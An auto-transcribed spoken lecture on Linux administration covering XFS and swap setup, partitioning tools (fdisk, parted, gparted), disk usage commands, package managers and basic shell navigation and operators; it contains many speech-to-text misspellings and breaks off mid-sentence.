I don’t want to kind of regurgitate and repeat myself over and over um but it’s allows for live environment allocation and changes to be made so that the users can still use the system and uh you can do what you need to do as the admin administrator the typical use cases for this are going to be of course Enterprise servers data centers um environments that have a lot of input output performance and scalability requests such as databases media servers scientific Computing etc etc so a big environment that requires a lot of processing power and high performance application so uh large files that need to be accessed and managed efficiently like video production or big data analytics these are some of the environments that re require xfs or make use of xfs and these are some of the example commands to create one so make file system make F mkfs do xfs and then you give it the mount Point pseudo xfs grow FSS grow FS excuse me pseudo xfs grfs and then the actual Mount Point itself so resizing requires the file system to be mounted and it supported only for increasing the size so just keep that in mind so you can’t decrease the size um you can increase the size of the file system by using grow FS grow the file system and then check the repair file system so xfs repair and then give it the mount point so this these are just some of the example commands for using and interacting with xfs and of course we have the swap file system so swap space uh it’s the dedicated partition or file that’s used to extend the memory as we’ve already discussed um it’s Unique compared to the everything else that we talked because it’s not a TR additional file system it’s actually uh used for live data right so it’s an extension to supplement the physical memory of which is our Ram our random access memory so it’s not storing files or storing data it’s just a live type of uh swap space or file system technically um it allows the system to avoid out of memory issues we’ve already gone through all of this so U memory overflow management is used when the system memory RAM is fully utilized we talked about this hibernation support we talked about this um the partitioning versus the swap file is kind of a concept that I guess uh should be noted here a swap partition versus a swap file so a swap was created as a separate partition so a swap partition uh it was created as a separate partition which could offer performance advantages due to the dedicated space on the dis the swap file which is inside of a lot of modern systems uh they use the file inside of a partition itself because it’s more flexible and it can be resized or removed quickly without having to deal with all of the partitioning commands so previously the swap partition was something that you have to actually have to create that specific partition using Fisk or uh you know any of these parted these various types of tools whereas if you’re dealing with a swap file you can resize the file remove the file do anything without actually having to mount unmount and deal with the the process that’s done through partitioning so uh more common systems are going to have a swap file and the kind of the older Legacy systems are going to have swap partitions the size recommendations for your swap file or your swap partition um it really has to do with the the Ram size itself so if there is not that much RAM typically available um then the system would benefit from more swap space so Twice The Ram size that that would really I don’t exactly know what is technically considered to be not that much RAM um if you have ample uh RAM so let’s say more than 8 GB if you have more than 8 GB of RAM then you don’t need that much swap space so for example you can get get away with having 2 GB of swap space and in some cases not at all if the memory is itself is actually really really powerful so if you have really really good Ram you probably don’t need a swap file or swap space um so so ju it just depends on the physical size of the ram itself now again unless it’s a really old business with very little uh RAM or like a really old computer you’re not going to run across a situation where the server doesn’t have enough RAM that’s just I I feel like uh this is a bit redundant but it is something of note so it is something that you should just keep in mind because you may deal with like a legacy computer or an old computer and they may not have that much RAM or maybe they’re expanding and the computer itself doesn’t have that much physical RAM and so you need to deal with uh some kind of a swap space or a swap file to uh to cater to the the massive size of the company or the as the company expands and continues to grow uh so that they don’t crash and until they can uh upgrade their systems and buy better Ram or you know bigger computer so on and so forth so these are some of our example commands for uh creating and activating a swap partition so uh you make the swap space first and then you turn it on so make swap that would be the swap space swap on you turn it on uh create and activate a swap file is a little bit more so the fall allocate or F allocate um one 2 gab or excuse me this would be an L it’s not a one so this would be 2 GB to the actual swap file which is would be the name of the swap file or the path to the swap file and then you need to change the permissions so to actually give it permissions and usually it’s uh the type of permissions that the system itself requires or root user requires and then you create the swap space so make the swap space and then give it the swap file path and then that then you enable it so first you have to allocate something for that swap file then give it the permissions that it needs and then make that as the swap space and and turn it on so that that specific swap file can be used and if you want to just look at the usage or see how it’s working so you can do swap on show or free- and those will give you the swap usage data points that you would need all right so now we’re going to talk about the various commands uh that will allow us to do everything that we just talked about so Fisk is one of the more common ones uh it’s a command line utility that’s used to create modify and delete partitions on a dis and it’s commonly used for managing the master boot Rec record or the MBR which is the traditional partition that allows you to have four primary partitions but it can also handle the GPT which is the guid partition table that can allow you to have more primary partitions so Fisk is the most commonly used right it’s a command line utility and you can create modify and delete partitions on a disk uh the key functions would be things like and this is in no way meant to be the full list of commands that you can run uh if you just do man MN Fisk then you’ll get the full list of what you can do with f disk so this is not something that’s supposed to be all-inclusive um but this you know these are some of the common ones so uh pseudo Fisk L would list all the available partitions and the basic disinformation about them uh interactive mode so if you run f disk as well as the name of the partition so this would be the path to the partition so you would need to replace that with the actual Target dis it opens an interactive mode where users can add delete or edit partitions inside of it so this could be a a interactive version of running f disk instead of just running individual commands to do what you want to do and after you’ve done all of your uh commands or modifications in interactive mode you would type w and press enter and that writes the all of the changes that you just made to the very the specific dis that that you are associated with so you would create a new Partition using the N option in f disk you would select that partition type or or choose a partition type that you want so for example xt4 and then assign the size that you would want and then you press W to press the changes this is this is like a overview we’re going to do this uh in detail when we actually go into the command line portion of this whole thing but you can also get a lot of different uh breakdowns of this if you just go to to uh gemini or if you go to GPT or anything like that and ask it to BL you through creating a partition and going through the various options of what would what it would be like to to mount it and delete it so on and so forth but we will go through those examples as well and then we have parted so it’s a more versatile command line tool than Fisk because it supports uh obviously supports the MBR and the GPT schemes um it’s ideal for resizing copying and modifying partitions without losing any type of data so it’s kind of a more recent version of it you will probably run across both of these and the command line structure of them is relatively similar and they have for the most part uh allow you to do uh the same things you just need to be familiar with the fact that both of them exist there is an interactive mode so very similar to f disk you would just do the same similar type of command except now you just do pseudo parted and you get into interactive mode you can create delete resar partitions with commands like like MK parts for make part RM to remove and then resize part very very like intuitive I think that’s one of the big things about it and then when you get to the GP uh GPD partitioning table um when using large drives which are mass so 2 terabytes in today’s world is actually a very large Drive part it is often preferred because it natively supports GPT uh which is used for a file system that is uh that requires more than for or primary partitions right so the the smaller file systems or the smaller storage discs use the previous one the MBR and then gpts for the file systems and the diss that are definitely going over two terabytes because they’re considered to be much larger especially when you’re not even dealing with media and you’re just dealing with text documents and uh configuration files and logs and things like that 2 terabytes is a lot of space so um parted ends up being being the Premier Choice the the first choice for that and example command to create a new Partition would be to just use parted uh this would be the disc or the physical location that you want it to be stored on you are making a partition so MK part and then you’re making a primary partition with the xt4 format and you want it to be a th000 megabytes in this particular case would ends up being a gigabyte So you you’re creating a gigabyte size primary partition with the xt4 format on the specified dis which would be at this particular location and then you can just run dis utility or a variety of different command line tools to figure out what partitions you actually have mounted onto your device and then from there you would choose that specific path for it as your creating your new partitions or extensions or logical partitions so on and so forth and then we have GP parted uh which is stands for The Gnome partition editor and it’s basically the graphical front end for parted and it’s available for a lot of Linux distributions that actually have a GU a graphical user interface if it’s just a command line uh Linux then it doesn’t exist but most of the desktop versions and anything that actually has a graphic user interface there is a g-p parted um version of parted a available for you and you can do everything that you would do with parted using an intuitive graphical interface so it’s very user friendly it provides a visual representation of partitions and unallocated space allows for easy resizing creating and deleting leading of partitions and it’s ideal for users who prefer graphic over command line management and need a quick way to modify partitions so pretty much does everything that part it does with a graphic interface since you’re not going to be using the command line you basically just need to know how to install this thing and so you would do pseudo apt install gparted and we’re going to go through apt which is a package manager and that’s for deban Ubuntu and then you can do pseudo dnf install gparted for Fedora um and then you just run it pseudo gparted to open the graphical interface uh so the launch and the installation is actually done on the command line but the rest of the stuff will be done through the graphical interface so you just need to know how to run these things um to install them and to start it and then from there you can go ahead and use the graphic interface okay so now we need to list the block devices right so we’ve created the devices and now we need to display the information about those devices including the Diss and the partitions to those Diss and you want it to be user friendly or close to user friendly so it does it in a tree format which you’ve already seen so um list lsblk will list the block devices it’s a great way to get a quick overview of storage devices on the system and the key features is that it has a higher article display so it’s the tree structure that we referred to earlier they’re showing you the relationship between the actual main device and its various partitions and it puts the information like the device name size type and mount points so the essential info you’re not going to get a lot of crazy details from this so but this is a very common tool to use to just see what all the block devices are essentially meaning what all the physical devices are and what the partitions are that are attached to them and it’s done in a nice tree format and these are some of the example commands so lsblk displays a simple tree view of all the devices uh using the dasf includes the file system information like file system type and uuid D and then- D shows only the main devices excluding any of the partitions if you have a very large environment you don’t want to see all the partitions you just want to see the main devices this will show you just those main devices using the DD flag or option and then we have DF which is disk free that basically reports what is uh being used or what is free so it gives you the the free space uh for each of the mounted file systems as well as what’s the the u space on it um but it’s one of those things that if you wanted to see just specific data about the file system dis space usage you would use disk free um it displays total and available space for each file system um dfh to display sizes in megabytes and gigabytes making the information more readable and then uh dftt will show the type of each of the file systems along with the usage stats that you have so this is for DF and then these are just some of the example commands so H again lists all the stuff H home will show show you the dis usage only for the home directory and again all of these things you can find the specific options that you can run by going through the manual page for each one of these tools we’re just going through sample commands and then when we actually get to the Practical version of this where we start using the command line and going through everything we’re going to go through a lot of this stuff in depth so this is I’m just going kind of like a quick overview of this so you can get some familiar I with it and then we’ll go into the great details later du is for disk usage and it’s used to check the space usage for specific files and directories providing a detailed view of which directories consume the most space so it’s not a file system thing uh it runs when you run du with the- SH uh on a specific directory it provides a summary of its total size when you run du by itself it shows dis usage for each directory and the subdirectory and then du and then the threshold of 100 m for megabytes displays only files directories that have over a 100 megabytes of space that they’re taking the command examples would be sh on this particular path would give you the total size of the ver log directory itself the ah home provides a detailed recursive view of the home usage and listing of the individual files and the directories which can be massive so this this you don’t want to do on a uh you don’t want to do on a super large uh directory because the the output could be massive so uh if anything you would uh take the output of this command and you would uh pipe it or export it into a separate file so that you can look at it outside of your terminal um because it really can be a a lot of data if you’re going to list all of the files and directories so it it can just be a really a big output so just keep that portion in mind most of this this specific thing you don’t want to run just on the terminal just to look at it because the termal doesn’t output everything it’s like it’s limited to how much data it can actually show you on the display even if you scroll all the way up you may not see everything all right now we can run through our package managers and the various commands that are associated with them so the intro to package managers um package managers are tools for managing software on Linux so it’s like a tool for managing other tools to help you install tools and to help you update tools so on and so forth they up uh they automat the process of installing updating removing software and it makes it relatively easy or if you know what you’re doing and if you are very familiar with the command line it makes it easier to maintain a consistent and upto-date system they handle dependencies uh meaning the the stuff that the software requires to run right so each software may require a certain number of dependencies for it to run so the the appt manager or the package manager excuse me the package manager will will handle those dependencies to make sure that any required libraries that you need and the tools are installed alongside whatever the software is that you are installing So when you say you know pseudo AP install such and such it won’t just install the tool it’ll install all of the dependencies and the libraries that that tool needs to run properly and then it saves you a lot of manual dependency resolution and potential conflict so you don’t have to go hunt down all the different dependencies cuz it can get very very tedious especially if it’s a piece of software that requires a lot of different elements and adjacent tools for it to run properly you don’t have to go hunt those things down manually you just run this one command and that one command gets all the dependencies that you need the libraries so on and so forth so very very useful um we have a which is the most common that I’ve used because I usually use ubun and Debian versions of Linux and it stands for the advanced package tool it’s very very common so if you want want to install something you do pseudo a install the name of the package if you want to update something pseudo AP update and pseudo AP upgrade you can technically run those both at the same time that’s what the double Amper Sands go into that we kind of talked about uh actually I don’t think we’ve covered operators yet I was just doing a a Linux tutorial Linux fundamentals tutorial so we haven’t gone through the operators yet but when you do two Amper signs right here that means you’re running both of these commands uh s multaneously so it’s going to run this one first and then it’s going to run that one next so it’s going to update the list of the softwares as well as the software itself and then it’ll upgrade anything that it needs to and if you want to remove something sudo ipt remove and then you give it the package name so very very intuitive and most of the package managers are actually similar to this um AP or apt is known for its ease of use the robustness and extensive repository of software packages and again it’s the most commonly used because it’s associated with Ubuntu and davan which is which are the the desktop versions of Linux and very very user friendly as you can tell the the commands themselves are super intuitive as well so very user friendly we have yum which is the yellow dog yellow dog updater modified or dnf which is the dandified version of yum um and this is for Red Hat uh so Cent Os or Fedora uh these are the distributions that would use yum but it’s it’s pretty similar to what we did with apt right so it’s like pseudo yum install name of the package or pseudo dnf install name of the package update or update it’s pretty much the same so you just use yum instead of Apt or you would use dnf instead of yum or whatever it is depending on what uh version of Linux you’re running and typically if you try to do like pseudo appt install such and such the the terminal will actually tell you oh this is not what is used on this system we use yum on this system or we use dnf on this system and it’ll give you an updated command to run so it’ll say yeah this doesn’t run here instead run pseudo yup pseudo yum install the package name so that’s it’s very also very very intuitive and very user friendly yam has been replaced by dnf in the newer dros like Fedora so dnf offers improved performance better dependency resolution and modern design um but essentially they kind of operate on the same uh distributions of Linux and then finally we have Pac-Man this is my favorite name uh it’s the package manager and it’s used for Arch Linux and Pac-Man’s uh commands are a little bit different than what we’ve seen with apt or yum so pseudo Pac-Man DS and then the package name is the installation pseudo uh Pacman Dash and this this is capital S by the way and then capital S Yu would be the software updates and then capital r package name would be the removal of the software itself so uh it’s known for the Simplicity speed and flexibility which is uh a common uh or a favorite among RS Linux users and handles binary packages and Source packages with ease so uh all the other ones do too in my opinion um or in my experience I guess I should say but this is something that is specific to the ARs linic distribution so you need to be aware of it so the name Pac-Man is not the video game it’s a package manager and it’s for Arch Linux and these are the the commands for the installation update and removal of software using Pac-Man and finally for this section we have the updating removal or troubleshooting of packages so updating packages and system upgrades um the reason why we want to do this is a few fold so the first one is security obviously so there are patches that need to be applied to certain packages as the vulnerabilities are discovered so when you’re considering the approach for ethical hacking and pentesting the reason why they do those things is because they want to try to break the package so that they can find what of the vulnerabilities are sometimes vulnerability scanners don’t do their jobs and sometimes there’s an announcement that’s made that hey we found this vulnerability you need to go patch this specific uh package that you’re using so uh this is not uncommon this happens very frequently and running an update on your package manager should be a a habitual thing that you do maybe even daily every time that you log into your Linux or every time that you’re about to install something or every time that you’re about to use a specific piece of software or specific package anytime you’re about to use that thing just run update real quick and just make sure that it’s the most recent version of that that includes all of the patches for it um then there’s also security features that are that come with those updated versions of those packages and then of course the dependency updates as well so if there’s new dependencies that are required to run the updated version that’s something that you may need and these are just some of the common things that fall under the bracket of security and then you have stability so there are bugs that are associated with these softwares or these packages so just make sure that that’s all updated I mean these are so common sense that I I feel like I don’t even need to go through this you just need to understand that updating packages and the system itself whatever you’re running needs to be a regular thing you need to check for system updates and package updates regularly to make sure that compatibility is there performance is there there are no bugs that are running there’s no security issues and the functionality is all great the user experience is great and of course if you’re in a regulated environment you need to be compliant so if there’s something that has to do with customer data and it’s not updated and then there’s a leak of the data because there was a security vulnerability you are now in grounds for a lawsuit or the company is in grounds for a lawsuit and guess what you as the Linux ad administrator are going to be fired because this is something that’s so simple that can so easily be done and it’s so powerful so it’s like just keep all of your packages up to date it keep your system up to date it’s not complicated to do runs a couple of commands and it’s very very useful and of course compliant to the regulatory environment that you may actually be in now the these are some of the update commands the upgrade commands so you do pseudo appt upgrade and it updates all of the installed packages that you have on your particular system that runs AP and then pseudo dnf upgrade runs all of the uh updates for the packages that you have installed on the NF system so if if you don’t want to upgrade the package individually as you’re about to run it you can just run this daily upgrade with a or dnf or Pacman or whatever it is and just make sure that everything on on your system in your environment is fully upgraded I would say removing and cleaning up the packages is probably just as important as running uh the updates on the packages the main reason for this is to free up space uh there’s also something called The Orphan package or unused dep dependencies that uh you just don’t use them anymore and they’re taking up storage space so this is probably something that is also as as important to run as the up updates of everything to just make sure that if there’s something orphaned meaning that it’s uh outdated and there’s a newer version of it if you run an upgrade on something you should also run the auto remove to remove whatever that’s been orphaned and a lot of times you will also get a notice from the system some kind of an alert that says hey are you sure you want to remove this this one’s associated with this and then you can either say yes or no but for the most part it’ll just take it will get rid of the things that are either orphant or legac or grandfather so on and so forth or unused so this is as important of a strategy as the upgrade and the update of all of your packages and thankfully troubleshooting the package issues is not something that you would have to do super uh in granular detail as well you just need to run a certain series of commands so if you have a locked database for example so if there’s a locked package manager in a Debian based uh system which is Ubuntu for example it means that another package management process is running or it didn’t terminate correctly so what you want to do is you want to remove that specific locked front end so pseudo RM removes the lock file and this is the location of the lock file so this is the file that’s used to lock that package database while the AP is running and then sudo RM removes that specific file this is the the full path to that file right so this is how you unlock lock a locked database for example and you’ll get that notification again your terminal will tell you that hey this can’t work because this is happening or this didn’t terminate correctly and then you can go ahead and just run the pseudo RM pseudo remove and it’ll work for you and then you have broken dependencies so if something is no longer current or it’s outdated or it’s missing a piece or uh a dependency for whatever reason wasn’t patched properly so if it’s not installed right any of those things the the version is outdated or it’s not the correct version any kind of conflict that would fall under a broken dependency you can do uh a fixed broken command so pseudo apt D- fix broken and then install so it tells app to uh fix broken dependencies by automatically installing or removing packages that are necessary and then dnf check will check for dependency issues and report them and then you can use dnf drro sync to synchronized installed packages to the versions in their repositories to make sure that all the dependency issues are resolved so again this is what’s really awesome about these package managers you don’t have to do the manual hunting of oh my God I got to go fix this I got a lot of these things are automated so you just run a command and it’ll just automatically install or remove packages that are necessary it’s like it’s so freaking useful but you just need to know that you can do this right and then you need to know what the command is so uh by the end of this whole thing you’re going to have a dictionary of commands that you can run to take care of a variety of different things which is just I think it’s super freaking useful so um there we go this the broken dependencies and then we have repository issues so repositories can be unavailable or misconfigured causing issues with the package management to resolve this you might need to reenable or update your repository resources and uh those things can be done using the various resources lists or uh the locations that are on the sources list so uh app sources list or the app sources list. D both of those are very useful on the debbas system so you can view the sources list in those regards and just see if it needs to be updated or the sources or the links or something might not be right um and then one of those one of the most powerful tools for that is just copy the contents of it and then take it to gemini or GPT and paste it and say hey does this look is something wrong with this and it’ll tell you if something’s missing or if something’s wrong um and then Red Hat systems check the repository file in the Etsy yum repos directory and that you can just make sure that all the sources for your repos are all good however if you don’t want to do all of that if you don’t want to go to GPT or whatever you can just run these commands right because they’re automated and they can just make sure everything is all good so if you run uh for AP you can run apt update for dnf you could run a make cache or dnf update date for yum you could make a cache or do a yum update info and then Pac-Man you can do this as well and essentially they’ll just make sure that the URLs and your repository files are correct and accessible and they’ll make sure that everything on your sources list is up to date and current so again you don’t need to do a lot of these things you don’t have to do manually because these amazing package managers will automate a lot of that processes for you and just make sure your sources are up to date make sure all the dependencies are up to date make sure the versions are current and if there’s any bugs or anything that’s been patched all the security vulnerabilities all of that stuff is taken care of by running regular updates and regular removals as well so make sure that the removals and the updates are being done in tandem to get rid of anything that might be orphaned or uh out of date and to make sure that everything that needs to be updated is updated to uh make sure that everything is all good you got to update the package list and basically this is literally these are the commands that would do all of that stuff for you as well but sometimes you might need to just restart the system or you might need to restart your shell um or just really just running the update command I think is actually all good um but just restarting the shell sometimes can uh do wonders if those update commands aren’t making everything run properly and then if that fails you can just restart the system um and then it just guarantees that everything is updated and current as as well as your package lists themselves all right now that you have Linux installed hopefully uh you took some time to actually install either your own version on a USB so you can Boot It live or you have it installed on your computer where you uh booted it as your operating system um or you’re using a virtual machine or you’ve used uh tryck me’s virtual machines that are all Linux based or you have a Linux computer whatever it is so hopefully now you’re in an environment where you can actually run these commands now if you have a Mac OS uh for the most part you can run most of these commands as well um if you don’t have them you may need to install them using one of the package managers and uh get access to them but uh in either case uh I would say do it in a Linux environment uh if you can download Cali Linux or a version of Ubuntu whatever it may be so that you have no problems and you can be sure you can rest assured that you can run all of the commands that are coming up um what we’re going to do is we’re going to go as an overview because we’re technically still in the lecture portion of this uh training series and I’m just going to show you what these commands are I’m going to tell you what they do and the purposes that they serve and then when we get to the second La the second portion of this whole thing where we actually get to the Practical exercises you will get plenty of chances to run all of these commands and will run all of these commands in an actual live environment while you’re you see me run the commands and we’ll look at the the output that comes from the commands and we’ll combine a variety of these different things um what we’re going to be talking about is just the basics of the command line and the basics of scripting so that you have an idea of what it all looks like and the the syntax and the general structure of all of this stuff and then we’ll go into the other chapters that we have and then when we come back at chapter 12 we’ll actually run all of the commands as well so that’s essentially where we at right now um the isial command line tools and navigation is what we’re going to look at all of these commands will yield some kind of information about the system that you’re logged into so who am I uh gets you the current logged in username by the way all of these things are case sensitive so if you do who am I with a capital W it’s not going to work who am I gets you the current logged in username uname displays all the detailed information about the Linux machine that you’re on including the hardware installation the name of the Linux uh the version of it the OS kernel version so on and so forth and then there are various options that come along with uname as well so this is just uname by itself there are other options or flags that you can attach to uname to get different results but uname is typically about the detailed information about the machine the hardware the name and the OS kernel then you have the host name which gives you the VPS name the VPS host name and other related info so depending on what flag you run with it it’ll get you different print information about that individual host so with no option it it just prints the host name uh with the if flag so Dash lowercase i it checks the server’s IP address- lowercase a prints the host name Alias uppercase a gets the system’s fully qualified domain name which is also known as the fqdn there is a difference between the who Ami and the host name so the who am I is just the user so whoever you are as the user you can be multiple users on the same host and that host would be on the same machine so the there could be multiple users logged in but they would be on the same host machine technically and then the same thing with the the hardware and the Linux machine and so on and so forth so who am I specific to the actual user that’s logged in un name is specific to the hardware of the machine the name the OS kernels stuff like that and then the host name is relevant to the actual host itself that you’re logged in on which is typically that machine um as well as the IP address the host name Alias if there is a host name Alias and the fully qualified domain name as well another way to look at the username and the host name is that the username is assigned to a specific user on a computer network while the host name is a label that’s assigned to the device on the network essentially identifying the computer itself rather than the individual user so there would be an IP address assigned to a the MAAC address and so on and so forth that would be assigned that would come under the host name data versus the username that comes under that individual person so the username is the login name while the host name is the name of the computer on the network and that’s not to be confused with the AME so the host name would be the name of the computer the username is the name of the user and then the uname just brings various data points about the computer itself for example the hardware and the the OS version so on and so forth all right on to navigation so navigating the actual computer itself so the first thing that I always run is PWD that prints the working directory meaning the directory that you’re currently logged in or the directory that you’re currently accessing it prints that path for you um CD changes the directory so if you do CD home user documents you’re changing the directory to the home user documents and you’re going to end up inside of the documents directory documents folder and then when you run PWD while you’re inside of the folder what’s going to happen is that you’re going to get this full path so it’s going to print that full path of wherever you’re logged in on onto your screen and that will say that is your printing of the working directory and then once in you’re inside of that directory you can list the contents of the directory which would be with ls and LS typically just by itself would just list whatever is visible it’s not a hidden file specifically what happens is that when you do LS L it’ll print the detailed view of all of those specific files and then when you do LSA it shows the hidden files and then you can combine these two flags and you can say LS L A so instead of doing- a or- l you could just do-la and it’ll give you the detailed view of everything as well as show you all of the hidden files as well so print working directory change the directory and list the contents of Any Given directory and then there’s the interaction with individual files and directories uh namely creating files and directories copying files and directories moving files and directories and these are what these commands are for so Touch by itself if you just create want to create any kind of a file you can do touch and then the name of the file which would be this specific thing if you want it to be inside of Any Given directory you can give it a full path but typically you would be inside the directories let’s say the documents folder and you just say touch file. text and it’ll create file. text for you and then there’s if there are any options that you want to attach to it you can attach those as well we’ll get into all of those things uh in a little bit when we actually get to the Practical section but touch is designed to create a new empty file in any given directory even the directory that you’re in or the directory that you give the full path to make dur which we would we make directory it creates one or multiple directories if you want it to and very similar it’s mkd and then any options that you wanted to give it and then the name of the directory one or directory 2 and that again could be the full path to the directory or you could be inside any given folder and then you create a new directory and basically what it does is it creates a folder that can house files whereas Touch by itself creates a file so you can’t expect the the file that’s been created by touch to be a container for any other files cuz it won’t be it’ll just be a file so make directory creates a folder that you can house a variety of other folders or you can house a variety of other files inside of it CP is copying so it can copy a file or a directory and then when it copies the directory it’ll also copy everything that is inside of that folder and so you would do CP and then you would provide the source which is the the thing that you want to copy and then you would provide the destination which could be the location of where you want it to go to and if it’s going to be inside of the same folder that you’re in you would copy the same the whatever the file is that you want to copy and then you just need to give it a name so that it won’t be the same exact name so if I want to copy file I would need to have as my destination file to be would be the second uh argument that we Supply to this command and it can still be inside of the same directory that we’re in it’ll be inside the same folder that we’re in or we can just say that I want you to take take whatever the file is inside of my current directory and I want you to copy it and move it to this whole other location and then you would give that full path to it and move would be another one of those tools that you can use but instead of uh copying it actually just takes that original file and it’ll transfer it out of wherever it’s sitting and move it to a different location you can also use it for uh renaming something so if I say move file one I would give the new location and it will transfer file one to that location or I can just say move whatever the old name is and rename it to change it to the new name and it it won’t copy anything it won’t do anything like that it will just rename the file for you so it can either move the file from wherever it’s sitting and transfer it somewhere completely different without copying it so just keep that in mind if you move it you’re not duplicating it you’re transferring the exact file itself or you can just rename the file RM would remove the file so that would be the command that you can delete an entire file or you can delete uh the directory that includes everything that’s inside of that directory so if you do rm- R it’ll actually delete the directory and everything that’s inside of it and it’s very similar to doing rmd so it removes the directory and everything that’s inside of that directory so you can do uh removal of the directory using the dasr uh flag that goes with it or you can just do remove dur and then remove everything that’s inside that directory as well as the directory itself so just keep that in mind that when you remove a directory you’re also removing everything that is housed inside of it so if you need it you need to make copies of it or you need to move whatever is inside of it to a different thing so that you can delete that directory file gets you the file type of whatever the name is that you give it so you say file either the path to the file or whatever the name of the file is inside your current folder and in that regard it’ll say okay this is a text file or it’ll say it’s a python file or it’ll be a CSV file comma separated value file so on and so forth it gives you the file type and believe it or not this is actually very useful especially when you get into scripting because there are certain interactions that you can’t have with certain file types so you need to know what type of file that you’re dealing with and if the file type is the file type that you want to interact with you would then use the series of commands that could potentially interact with that file so getting a file type is actually very important especially when you get into scripting and then zip would compress the file so it basically just creates a zip file for you from one or more files or a directory uh that you assign so you can say zip and then choose whatever option that you want and then you would take the file name and then uh that you want to create so this will be the zip file name that you want to create and then this will be the file that want to be added to it the next file that’s going to be added to it you can have a series of files but essentially you would zip this would be the name of the zip file the name of the zip folder and then these would be the files or the folders that would actually be compressed into that one zip file that one ZIP compressed folder unzip extracts the data or the the contents of that individual zip folder so very it’s a pretty simple concept to understand so again if you choose any specific uh uh options you can do that um and then you just give it the zip file name that you want it to unzip typically it would unzip in inside of whatever location that it’s already in so you just want to make sure that uh wherever you are unzipping it you want those contents of those files because uh sometimes a zipped file will have a bunch of content in it and when you do unzip it uh if you wanted to move to somewhere else you would have to move all of those things manually uh by doing the the MV command so if you want to unzip it in any given directory a specific location that you want all of that content to be first you move move the zip file to that location and then you unzip it um a tar or tar command itself it bundles multiple files and directories into an archive but it doesn’t compress them so you just run tar the tar file name wherever the location is going to be and then the files themselves they don’t get compressed typically it’s good for archiving and creating archives um so that you can interact with them without having to unzip them because when you zip something it gets compressed and then you would have to unzip it to be able to interact with it tar just bundles it multiples files into one location known as an archive and then you can interact with the contents of that without having to decompress it or uh unzip it so to speak these are some of the key operators that you need to keep in mind and this is actually very important because you need to be using this very very frequently so the first one I’m just going to call this the greater than symbol or pointing forward I guess we can call it whatever it is um the greater than or pointing forward adds the outputs of any command to an output file so for example example if I do Echo file contents just by itself it’ll just print file contents onto the screen but if I do Echo file contents and I push it into the new file then it takes this whatever is inside of this or whatever is inside of Any Given command really and it puts that inside of this file then this overwrites anything that is currently inside of the file so you need to be careful with that because if you want to append something if you want to add data to Any Given file you would use the double uh greater than symbols instead of a singular one because the singular one literally overwrites everything inside of that file and you lose whatever else was previously inside of the file so more often than not what you’re going to do is you’re going to take a given command so you’re going to run some kind of a command that will analyze something we do this a lot in security where we would run a uh let’s say a top command or we would run um TCP dump or something like this we would run some of these commands and instead of getting the contents uh displayed onto the screen because it’s going to be a lot of content we would output the content inside of this file so that we can review it later and manipulate the content of it um when you’re appending something you would add whatever those contents are to a new file and for scripting this is very very important to understand because more often than not when you write a script you don’t want that script to overwrite everything that would be inside of your folder or inside of your uh the output file you wanted to add every time that you run that script you want it to add the contents to the output file instead of overwriting everything that’s inside of that file so this one overwrites everything and creates a new file or it’ll just create a new file for you um then this one appends it it adds the output to the file and you keep everything that was previously inside of that file there is the and so ampers and uh you place this at the end of Any Given command uh especially if it’s a big command that takes a long time to process so that it backgrounds the command for you and then when it’s backgrounded you can still continue to use your uh CLI your command line um instead of having to wait for that command to finish so for example if we were to run uh something that’s big like this and then we were going to Output the results of it to a file but we had to wait for the command to finish we would just put an erson at the end of this command and then it would run it would do whatever it needs to do it’s going to create our output file for us and then we can continue to run whatever other commands that we wanted to run while that previous command was completing um this specific one right here where you have a double ERS sand it combines multiple commands and then gives you uh one overall input so you can do uh touch new file so you create a new file and Echo onto the screen that there was a new file that was created and Echo the contents of the file into the new file that we just created right here right so technically you’re running three commands you’re creating a file then you’re notifying that the file was created and then you’re adding whatever contents you want to that file so this is very useful especially if you actually know what you’re doing and you want to get a lot done and not have to do multiple commands uh and then just press enter wait for it press enter wait for it instead of doing that you can just combine a series of commands and then that way with one pressing of the enter button you run the whole thing and then if you have notifications in between each one of the steps you will get all of those notifications and you’ll be uh you’ll know exactly where you are in the process and then it’ll be done real quick so uh Ampersand by itself you put it at the end of a command and then you run that command in the background when you do this when you double up the ERS hand you can combine a variety of different commands and you can string together uh really as many commands as you want um if it gets to the point that you have to run a bunch of commands and you’re trying to combine a bunch of commands at that point you might as well create a script which we’re going to get into in a little bit so uh so far these are the key operators that we got once you’ve created files or if you have a bunch of files that you’re trying to view there are a few few different ways that you can do this when you do cat it concatenates that’s what it stands for it concatenates the the contents of that file and it just prints everything onto the terminal um if it’s a massive file there’s going to be a very large output and sometimes the terminal limit the amount of lines that’s output and you may miss uh all of the contents at the very very top of the file if it’s a really large file typically that happens usually with log files so if you have a very large log file then instead of doing cat and displaying everything on the terminal you can either do less and more to view large files Page by page so you do less and then the name of the file name and then you can uh click your uh the arrow buttons on your keyboard and then you would go onto the next page and on the next page head and tail will display either the starting or ending 10 lines and then you can also just uh display however many lines that you want so if you do tail n 10 it’ll display the last 10 lines of this file if you do tail N5 it’ll display the last five lines of this given file so this is also very useful if you’re trying to if you know that a certain amount of data like if you want all of the headers for example of the file you will look at the top 10 lines and then if you want the most recent data which is typically what’s going to be at the bottom of Any Given log file you want the last 10 lines or the last five lines whatever it is so you can look at the most recent data instead of having to scroll back and forth to try to find it and then there’s find so find itself is actually very very useful if you know kind of what you’re looking for you just don’t know where it is right so for example it would be find and then if you do the p it could be just forward slash that represents the root which means that all of the folders inside of the root you want to search basically in the entire machine so you want to search inside of the root which would be the path or you could say you know uh the documents for example so you can give the path to the documents and you say look inside of the documents and look for a let’s say if I do Dash name which means that I want you to find something by its name and and then you give it the name that you wanted to look for we’re going to do a lot of this because this is actually very useful um and locate of the file uh is essentially the same thing and it prints this location onto the screen so locate uh keyword and sometimes depending on where you’re at uh what type of machine that you’re on locate may not give you results fine may give you the results or fine won’t give you the results locate will give you the results they essentially do the same thing um so that’s kind of what it is for find usually you need to actually give it the path that you want it to search for locate just looks for it and then says this is where the path is so you can locate and then find whatever the path is uh for whatever keyword that you’re looking for find itself you would need to give it a location for it to search and then it’ll go look for whatever the the name is or if you’re looking for a file type or a permission uh so on and so forth it’ll display all of those things for you and then we have our common text editors so Nano and Vim are the most common text editors that are available on Linux uh Nano is very very user friendly Vim is also userfriendly in my opinion it’s just not as uh straightforward to deal with um so for example if you do Nano file.txt it’ll open up file.txt if you don’t have something called file.txt it’ll actually create file.txt so it’s very similar to using the touch command um but what happens is that you can now uh write inside of that file so if I do Nano file.txt there’s nothing inside of the file I can start writing inside of the file if there is something inside of the file and I do Nano I open it up and now I can interact with the content inside of that file so I can look at everything uh scroll back and forth if it’s a massive file instead of doing cat and then printing 